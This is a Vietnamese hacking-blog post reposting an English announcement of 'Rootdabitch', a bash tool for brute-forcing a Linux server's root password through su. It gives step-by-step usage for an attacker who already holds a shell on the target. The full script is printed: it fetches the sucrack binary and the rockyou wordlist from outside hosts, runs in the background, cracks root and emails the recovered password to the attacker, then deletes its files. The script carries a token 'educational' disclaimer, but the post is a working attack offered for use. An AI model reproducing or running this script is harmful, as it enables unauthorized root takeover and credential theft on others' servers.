New Post

Wednesday, August 29, 2012

Rootdabitch version 0.1 - Multithreaded Linux root password Bruteforcer

r00tw0rm hacker "th3breacher!" release Rootdabitch v0.1 ,which is a Multithreaded Linux/UNIX tool to brute-force cracking local root through su using sucrack.

sucrack is a multithreaded Linux/UNIX tool for brute-force cracking local user accounts via su. The main feature of the Rootdabitch is that It's local brute forcer, using 10 passwords in 3 seconds. and works in background so you can leave it , when root is cracked it will email the user using /bin/mail .

All for this, you need to have a php shell/reverse shell/ssh access to the target to run thistool and run it as a normal user, Upload this script into it and give it the execution permission and execute the script like:

~ ./rootdabitch youremail@address.com  

If the password is cracked you will have a mail with the root password and the password will be stored into password.txt . Try it !

Download : http://rootdabitch.googlecode.com/fi...abitch-0.1.zip

Anh em thảo luận

Nguồn: http://thehackernews.com/2012/04/roo...ithreaded.html

======
Dịch:
Nôm na là Script này crack password của root bằng cách Bruteforcer với 3 giây dc 10 passwords.

Để sử dụng cần có 1 shell trên server cho phép chạy command.

Upload file này lên site hoặc download nó về bằng lệnh



PHP Code:
wget  http://rootdabitch.googlecode.com/files/rootdabitch-0.1.zip 
Sau đó giải nén bằng lệnh


PHP Code:
unzip rootdabitch-0.1.zip 
Trao quyền thực thi cho file rootdabitch.sh bằng 1 trong 2 lệnh


PHP Code:
chmod +x rootdabitch.sh 
PHP Code:
chmod 755 rootdabitch.sh 
Sau đó thực hiện chạy script này với cú pháp


PHP Code:
./rootdabitch.sh tên_email 
Nếu crack thành công nó sẽ send password của root về email cho mình.

Code luôn, chỉ việc chmod and run:
 

#!/bin/bash

# R00TW0RMs (https://www.r00tw0rm.com/)
#-------------------------------------|------------------------------------------#
# ( )_ ( ) ( ) _ ( )_ ( )
# _ __ _ _ | ,_) _| | _ _ | |_ (_)| ,_) ___ | |__
#( '__)/'_`\ /'_`\ | | /'_` | /'_` )| '_`\ | || | /'___)| _ `\
#| | ( (_) )( (_) )| |_ ( (_| |( (_| || |_) )| || |_ ( (___ | | | |
#(_) `\___/'`\___/'`\__)`\__,_)`\__,_)(_,__/'(_)`\__)`\____)(_) (_)
# This was written for educational purpose and pentest only.
# Use it at your own risk. Author will be not responsible for any damage!
# Coder : th3breacher |th3breacher.wordpress.com|
# Version : 0.1
# Greetz : Inj3ct0r Team (1337day.com)
#-------------------------------------|------------------------------------------#
#Sucrack and wordlist links could be changed to a suitable one !
sucracklink="http://dl.dropbox.com/u/65302835/sucrack"
wordlistlink="http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2"
wordlistcompressedname="rockyou.txt.bz2"
wordlistname="rockyou.txt"
threads=10
#-------------------------------------|------------------------------------------#
email=$1

mynohup(){
# Close stdin, and make any read attempt an error
if [ -t 0 ]
then
exec 0>/dev/null
fi

# Redirect stdout to a file if it's a TTY
if [ -t 1 ]
then
exec 1>nohup.out
if [ $? -ne 0 ]
then
exec 1>$HOME/nohup.out
fi
fi

# Redirect stderr to stdout if it's a TTY
if [ -t 2 ]
then
exec 2>&1
fi

# Trap the HUP signal to ignore it
trap : HUP
}

downloadthatdic ()
{
echo -ne "[+] Downloading the wordlist from $wordlistlink\n"
wget $wordlistlink
bunzip2 $wordlistcompressedname
}
downloadsucrack ()
{
echo -ne "[+] Downloading sucrack from $sucracklink\n"
wget $sucracklink
chmod +x sucrack
}
action_send_mail_done()
{
SUBJECT="rootdabitch cracked password"
# Email To ?
EMAIL=$1
# Email text/message
EMAILMESSAGE="password.txt"
# send an email using /bin/mail
mail -s "$SUBJECT" "$EMAIL" < $EMAILMESSAGE

}
action_send_mail_undone()
{
SUBJECT="rootdabitch :("
# Email To ?
EMAIL=$1
# Email text/message
EMAILMESSAGE="password2.txt"
echo "failed..."> $EMAILMESSAGE
# send an email using /bin/mail
mail -s "$SUBJECT" "$EMAIL" < $EMAILMESSAGE

}

crackthatmofo ()
{
echo -ne "[+] Cracking with 10 threads..."
#You can change the threads number as you wish , just make sure it doesnt crash the server :)
./sucrack -w $threads $wordlistname | grep "password is:" >password.txt
if [-f "password.txt"]; then
action_send_mail_done $email
else
action_send_mail_undone $email
fi
}
cleanup ()
{
echo -ne "[+] Cleaning up..."
rm -f $wordlistcompressedname
rm -f $wordlistname
rm -f sucrack
}

#Main starts here
echo -ne "[+] Wait ! .. have patience=)\n"
mynohup
downloadsucrack
downloadthatdic
crackthatmofo
cleanup

0 nhận xét:

Post a Comment